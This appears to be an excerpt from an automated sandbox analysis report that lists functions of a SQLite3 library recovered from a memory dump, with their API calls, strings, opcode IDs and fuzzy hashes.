                                                    • Opcode ID: e81641acdc80f010407dfa09339502c5e308d6a6cdc13139e48fdcd17c5a4ecd
                                                    • Instruction ID: ee2211410323f0822fb5b8456f27500c7e657f78fa5a8188c5d8600e7892813e
                                                    • Opcode Fuzzy Hash: e81641acdc80f010407dfa09339502c5e308d6a6cdc13139e48fdcd17c5a4ecd
                                                    • Instruction Fuzzy Hash: D0315E71B082458BE7049FA9C58135EBAE5EFC8348F25C42DE848DB399D779D886CB42
                                                    APIs
                                                    • sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E28D11), ref: 61E28C15
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28D11), ref: 61E28C3D
                                                    • sqlite3_log.SQLITE3 ref: 61E28C5B
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28D11), ref: 61E28C91
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 1015584638-0
                                                    • Opcode ID: 23ff65156954d73aba91898869837fd3ec720ee766246a1c09e114aa0dcce5b6
                                                    • Instruction ID: a2d9c72bd6979fa4165dc3b624364682f3d098ec0a7e4d49a666c84b6a07e7cc
                                                    • Opcode Fuzzy Hash: 23ff65156954d73aba91898869837fd3ec720ee766246a1c09e114aa0dcce5b6
                                                    • Instruction Fuzzy Hash: 9D31227520A6418BEB04AF68C4A1B4677E1EFC9318F29C56DEC488F35AD739D841EB43
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E44CA2
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E44CAD
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E44D66
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E44D71
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: b56d698b17c5cc7e6b74d8873afc87c598d2eca3a267aa780d9352a21d1956a7
                                                    • Instruction ID: 736584ff8bbcefa8775b1b1d8917eafcf9340ce1d6e5960cecbefdcc9fb5dcb3
                                                    • Opcode Fuzzy Hash: b56d698b17c5cc7e6b74d8873afc87c598d2eca3a267aa780d9352a21d1956a7
                                                    • Instruction Fuzzy Hash: 59217C747087528BD701AFA8E48070ABBF5EF85318F24C46EEC988B345DB74D851CB82
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E34C42
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E34C5A
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E34C7D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E34CC1
                                                    • sqlite3_memory_used.SQLITE3 ref: 61E34CC6
                                                    Similarity
                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                    • String ID:
                                                    • API String ID: 2853221962-0
                                                    • Opcode ID: dfb0f96b138980c5a6a60c59f5766c6bb669fc7cb9715ea66773d005dc7aa4c4
                                                    • Instruction ID: 037f8c9daebb68fe637279f5c25e7bbaab550abdca41c161f407b429832bc755
                                                    • Opcode Fuzzy Hash: dfb0f96b138980c5a6a60c59f5766c6bb669fc7cb9715ea66773d005dc7aa4c4
                                                    • Instruction Fuzzy Hash: 77112E31A14A559BDB08DFBAC44049D77E5BBCA314B24CA2BE954DB340E731E8818B81
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                    • String ID: winAccess
                                                    • API String ID: 2284118020-3605117275
                                                    • Opcode ID: a71dec1c6a8c25fa824c486ff13e728697d1badbf545f609830d75b4830920b8
                                                    • Instruction ID: 1b75e179348b4d00ab9a37f7e408ef24722f720dce440250f2a33d3fdc78ae69
                                                    • Opcode Fuzzy Hash: a71dec1c6a8c25fa824c486ff13e728697d1badbf545f609830d75b4830920b8
                                                    • Instruction Fuzzy Hash: 4731727190469DCFDB00AFA8C85439EB7B0FB89328F25C628DC6597384D774D996CB82
                                                    APIs
                                                      • Part of subcall function 61E24ED6: sqlite3_value_text.SQLITE3 ref: 61E24EE9
                                                      • Part of subcall function 61E24ED6: sqlite3_value_bytes.SQLITE3 ref: 61E24EF5
                                                      • Part of subcall function 61E24ED6: sqlite3_get_auxdata.SQLITE3 ref: 61E24F13
                                                      • Part of subcall function 61E24ED6: memcmp.MSVCRT ref: 61E24F34
                                                    • sqlite3_value_text.SQLITE3 ref: 61E386E1
                                                      • Part of subcall function 61E38569: sqlite3_mprintf.SQLITE3 ref: 61E385BB
                                                      • Part of subcall function 61E38569: sqlite3_result_error.SQLITE3 ref: 61E385D5
                                                      • Part of subcall function 61E38569: sqlite3_free.SQLITE3 ref: 61E385DD
                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E38785
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                                    • String ID: J$null
                                                    • API String ID: 3173415908-802103870
                                                    • Opcode ID: b65edc31093eebe5c15463c92f96c15db0c6148a8ef1af62338ac1303ab8b3fd
                                                    • Instruction ID: 37da3c831580d96340a110bc9ec424059e46a0c591be7b831ca33d7fb3854fb1
                                                    • Opcode Fuzzy Hash: b65edc31093eebe5c15463c92f96c15db0c6148a8ef1af62338ac1303ab8b3fd
                                                    • Instruction Fuzzy Hash: B0316874A00269DBDB21EE64C880F8E77B6AFC5358F20C169E848CB301DB34DA95CF81
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E38900
                                                    • sqlite3_value_text.SQLITE3 ref: 61E38920
                                                    • sqlite3_result_value.SQLITE3 ref: 61E38968
                                                      • Part of subcall function 61E382CE: sqlite3_mprintf.SQLITE3 ref: 61E382E3
                                                      • Part of subcall function 61E382CE: sqlite3_result_error.SQLITE3 ref: 61E382F9
                                                      • Part of subcall function 61E382CE: sqlite3_free.SQLITE3 ref: 61E38301
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                    • String ID: replace
                                                    • API String ID: 822508682-211625029
                                                    • Opcode ID: d6a075fc9385f2870f31d54738133b66e58c9dec222dbe774954b2553996a209
                                                    • Instruction ID: b495a76041714367cee2641f541fe079985229e2439daef6e58c3e5da425b10b
                                                    • Opcode Fuzzy Hash: d6a075fc9385f2870f31d54738133b66e58c9dec222dbe774954b2553996a209
                                                    • Instruction Fuzzy Hash: F6213930A083999BCB11DF68C094A99BBF5AFC5368F29C519EC88CB350D735E945DB82
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1C08A
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • sqlite3_realloc.SQLITE3 ref: 61E1C0D8
                                                    • sqlite3_free.SQLITE3 ref: 61E1C0EE
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                    • String ID: d
                                                    • API String ID: 211589378-2564639436
                                                    • Opcode ID: fec92f39fc0cf641781cb09932307d85cf5c1768cc2373b992d601d6050d7ff5
                                                    • Instruction ID: 0dab24422b3aaab0e7954a130753e66152b50dfb51cd1ffeb7d0ad6ad4cdfdad
                                                    • Opcode Fuzzy Hash: fec92f39fc0cf641781cb09932307d85cf5c1768cc2373b992d601d6050d7ff5
                                                    • Instruction Fuzzy Hash: E821E3B5A04245CFDB10DFA9C4C1A99BBF5BF89314F24846AC9489B319E738E845CFA1
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_int$sqlite3_result_blob
                                                    • String ID: <
                                                    • API String ID: 2918918774-4251816714
                                                    • Opcode ID: 19bd7e7b611b2361db068fe4acd9e139a126047da29ae0fc4575aae92c7aeede
                                                    • Instruction ID: 332952715c504e3dbb26be1f2f87f56dc6b652388c2674ae0367154961bdb7bb
                                                    • Opcode Fuzzy Hash: 19bd7e7b611b2361db068fe4acd9e139a126047da29ae0fc4575aae92c7aeede
                                                    • Instruction Fuzzy Hash: E1116AB590430A8FCB04DF6AD48099ABBF5FF88364F15856EE8588B360E334E951CF91
                                                    APIs
                                                      • Part of subcall function 61E28A4C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28AFF), ref: 61E28A87
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E28B8B
                                                    • sqlite3_value_text.SQLITE3 ref: 61E28BA4
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28BBE
                                                      • Part of subcall function 61E260ED: sqlite3_log.SQLITE3 ref: 61E26116
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                    • String ID: out of memory
                                                    • API String ID: 645246966-2599737071
                                                    • Opcode ID: 2b0b10450135ebd885a2efafbf90defc066e63970d37fc0b064ef14241d81b14
                                                    • Instruction ID: f9a63698f4cbaa5ed84e1c99b846ddefaeada963818a5c5e94380c32a98722d9
                                                    • Opcode Fuzzy Hash: 2b0b10450135ebd885a2efafbf90defc066e63970d37fc0b064ef14241d81b14
                                                    • Instruction Fuzzy Hash: 1901A4B4A082494BDB409FA5D8D0A1A77F4EF45318F28C4BDEC458F301EB35D8909B81
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                    • API String ID: 1646373207-328863460
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1F53F
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • sqlite3_free.SQLITE3 ref: 61E1F656
                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E1F779
                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F78E
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                    • String ID:
                                                    • API String ID: 4229029058-0
                                                    APIs
                                                    Similarity
                                                    • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                    • String ID:
                                                    • API String ID: 2374424446-0
                                                    APIs
                                                      • Part of subcall function 61E18EEF: sqlite3_malloc.SQLITE3 ref: 61E18F1C
                                                    • sqlite3_free.SQLITE3 ref: 61E3566A
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E3569D
                                                    • sqlite3_free.SQLITE3 ref: 61E35735
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                    • String ID:
                                                    • API String ID: 3567284914-0
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E38A91
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E38AB1
                                                    • sqlite3_vfs_find.SQLITE3 ref: 61E38AF0
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E38BEF
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                    • String ID:
                                                    • API String ID: 321126751-0
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                    • String ID:
                                                    • API String ID: 3596987688-0
                                                    APIs
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E2332E
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E233C6
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E233E6
                                                    • sqlite3_free.SQLITE3 ref: 61E233EE
                                                      • Part of subcall function 61E124A0: sqlite3_free.SQLITE3 ref: 61E12546
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                    • String ID:
                                                    • API String ID: 4082161338-0
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1913F
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E19187
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E191AE
                                                    • sqlite3_free.SQLITE3 ref: 61E191DC
                                                    Similarity
                                                    • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 2308590742-0
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_stricmpsqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 3779612131-0
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E12C8D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E12CDB
                                                      • Part of subcall function 61E0FFF3: sqlite3_mutex_enter.SQLITE3 ref: 61E10032
                                                      • Part of subcall function 61E0FFF3: sqlite3_mutex_leave.SQLITE3 ref: 61E100DA
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E12CFF
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E12D20
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E385BB
                                                    • sqlite3_result_error.SQLITE3 ref: 61E385D5
                                                    • sqlite3_free.SQLITE3 ref: 61E385DD
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E385E7
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                    • String ID:
                                                    • API String ID: 3282944778-0
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E88806
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E88820
                                                    • sqlite3_realloc64.SQLITE3 ref: 61E88855
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E8887D
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 1177761455-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: __dllonexit_lock_onexit_unlock
                                                    • String ID:
                                                    • API String ID: 209411981-0
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E0C766
                                                      • Part of subcall function 61E0A23E: sqlite3_free.SQLITE3 ref: 61E0A25F
                                                    • sqlite3_free.SQLITE3 ref: 61E0C779
                                                    • sqlite3_free.SQLITE3 ref: 61E0C75B
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free.SQLITE3 ref: 61E0C7A7
                                                      • Part of subcall function 61E0A3D5: sqlite3_free.SQLITE3 ref: 61E0A3E6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 3930042888-0
                                                    APIs
                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E37DC8
                                                      • Part of subcall function 61E34CFC: sqlite3_initialize.SQLITE3 ref: 61E34D02
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37DF2
                                                    • sqlite3_free.SQLITE3 ref: 61E37DFD
                                                    • sqlite3_free.SQLITE3 ref: 61E37E10
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                    • String ID:
                                                    • API String ID: 690915108-0
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1F1DD
                                                    • sqlite3_result_error.SQLITE3 ref: 61E1F20D
                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F223
                                                    • sqlite3_result_int64.SQLITE3 ref: 61E1F23B
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                    • String ID:
                                                    • API String ID: 3779139978-0
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E18170
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E18188
                                                    • strcmp.MSVCRT ref: 61E181A5
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E181B6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                    • String ID:
                                                    • API String ID: 2933023327-0
                                                    APIs
                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E36CE4
                                                      • Part of subcall function 61E34CFC: sqlite3_initialize.SQLITE3 ref: 61E34D02
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36D02
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    • sqlite3_free.SQLITE3 ref: 61E36D0E
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free.SQLITE3 ref: 61E36D16
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 2126213637-0
                                                    APIs
                                                    • sqlite3_value_pointer.SQLITE3 ref: 61E37BDC
                                                      • Part of subcall function 61E0E51C: strcmp.MSVCRT ref: 61E0E54A
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37BF5
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    • sqlite3_result_error.SQLITE3 ref: 61E37C0B
                                                    • sqlite3_free.SQLITE3 ref: 61E37C13
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                                    • String ID:
                                                    • API String ID: 2416658597-0
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E88893
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E888AB
                                                    • sqlite3_free.SQLITE3 ref: 61E888B8
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E888D4
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                    • String ID:
                                                    • API String ID: 3512769177-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_strnicmp
                                                    • String ID: '$null
                                                    • API String ID: 1961171630-2611297978
                                                    • Opcode ID: 4915e0317345a2fec89210722418c639ac592a62e769f9dae064e8f4d44adc95
                                                    • Instruction ID: 119816925cc4f9c2b42e67d083debc9352ddc86815b2ff80b258f418b1e40946
                                                    • Opcode Fuzzy Hash: 4915e0317345a2fec89210722418c639ac592a62e769f9dae064e8f4d44adc95
                                                    • Instruction Fuzzy Hash: AE312964E491864EF701CDB4C465391BBD3AB8A30BFF8D36CC5C44A2CAE23AD8E94341
                                                    APIs
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E26E7D
                                                      • Part of subcall function 61E17701: InterlockedCompareExchange.KERNEL32 ref: 61E17721
                                                      • Part of subcall function 61E17701: InterlockedCompareExchange.KERNEL32 ref: 61E17768
                                                      • Part of subcall function 61E17701: InterlockedCompareExchange.KERNEL32 ref: 61E17788
                                                      • Part of subcall function 61E1768B: sqlite3_win32_sleep.SQLITE3 ref: 61E176E3
                                                    • sqlite3_free.SQLITE3 ref: 61E26F48
                                                    Strings
                                                    Similarity
                                                    • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                    • String ID: winDelete
                                                    • API String ID: 3336177498-3936022152
                                                    • Opcode ID: be36d6db39c3b5ba1a7ee0445776ab7a307389d17740f8c0a9672ded830e6cc9
                                                    • Instruction ID: 153c4c0713fb4d17254f0be0e11834e24d8c0f092806fb1a5de6b0f5bc0ce4c1
                                                    • Opcode Fuzzy Hash: be36d6db39c3b5ba1a7ee0445776ab7a307389d17740f8c0a9672ded830e6cc9
                                                    • Instruction Fuzzy Hash: 17319170A0469A8BEF015FA5C4A069E77B4EF8E718F60C629FC5197384D738D9828B52
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 3
                                                    • API String ID: 0-1842515611
                                                    • Opcode ID: c359f8b81d68eb8c9f7ae1edab7660c1e8a7c51962e241991ea287fe3aa8b880
                                                    • Instruction ID: 8817a0866705175885a710439bbd4836f620ae11ce378b682b2c1ac3b741db12
                                                    • Opcode Fuzzy Hash: c359f8b81d68eb8c9f7ae1edab7660c1e8a7c51962e241991ea287fe3aa8b880
                                                    • Instruction Fuzzy Hash: FA31BE78A042558FEB918F64C4C0789BBF1BF45328F2881A9DD589B346D335E991CF92
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: Virtual$ProtectQuery
                                                    • String ID: @
                                                    • API String ID: 1027372294-2766056989
                                                    • Opcode ID: 68ef9edf323589f895f67eb294aaeaa364d5fa48cf3b872ae2af3e2badbed1b5
                                                    • Instruction ID: 6897677ba175805eef62a58521b70793c343af48df22e6b21b0e6597144c718b
                                                    • Opcode Fuzzy Hash: 68ef9edf323589f895f67eb294aaeaa364d5fa48cf3b872ae2af3e2badbed1b5
                                                    • Instruction Fuzzy Hash: 85316DB2905B028FE790DF69C48461ABBE0FBC5354F55C91DD95D97340E734E884CB91
                                                    APIs
                                                    • sqlite3_exec.SQLITE3(?,?,?,?,?,61E5E83A), ref: 61E5E5B3
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_exec
                                                    • String ID: 9&a$sqlite_stat1
                                                    • API String ID: 2141490097-15788650
                                                    • Opcode ID: 4a0e5da4288da6d35be70e32a0061fee6ce949551c033239e873b51cf4a9ec24
                                                    • Instruction ID: 376e2e6fa9c1220bfe13d65ee9552f892fc783fbf2521727bac6187e7dfc5923
                                                    • Opcode Fuzzy Hash: 4a0e5da4288da6d35be70e32a0061fee6ce949551c033239e873b51cf4a9ec24
                                                    • Instruction Fuzzy Hash: 3D215CB1A047029FD740CF6AC480A1AFBF0BF88258F25C56DE858DB391E735E821CB91
                                                    APIs
                                                    • sqlite3_stricmp.SQLITE3(00000000,?,?,61E5E56C), ref: 61E03DD1
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_stricmp
                                                    • String ID: sqlite_master$sqlite_temp_master
                                                    • API String ID: 912767213-3047539776
                                                    • Opcode ID: a988c5acb42c6b431b114348884e4b5206804e472cbcaf0d9f3f89d42eb742e6
                                                    • Instruction ID: 42914314482c5c7be0334dfd1ceba6cec5b62f496014fc4bcda36ba78da05ce0
                                                    • Opcode Fuzzy Hash: a988c5acb42c6b431b114348884e4b5206804e472cbcaf0d9f3f89d42eb742e6
                                                    • Instruction Fuzzy Hash: DD118275B042168FAB00DFADC880A5BBBF4FF84219B258466DC24DB305D370D92287A1
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1EC2C
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E1EC38
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                    • String ID:
                                                    • API String ID: 3265351223-3916222277
                                                    • Opcode ID: 034ccde8151b4e158b1c14126d3aa0e2df06ac6c5da64a2a741d60d68d2e3c5b
                                                    • Instruction ID: b9349483fea1c0add4c2fde2e21c29d77ba5761b23afb17a80a5ad6ef4537e8f
                                                    • Opcode Fuzzy Hash: 034ccde8151b4e158b1c14126d3aa0e2df06ac6c5da64a2a741d60d68d2e3c5b
                                                    • Instruction Fuzzy Hash: 30116530508B858BDF099FA9C4C625A7FF4FF59308F208498E8948B34AD771D9A0C7D2
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E26167
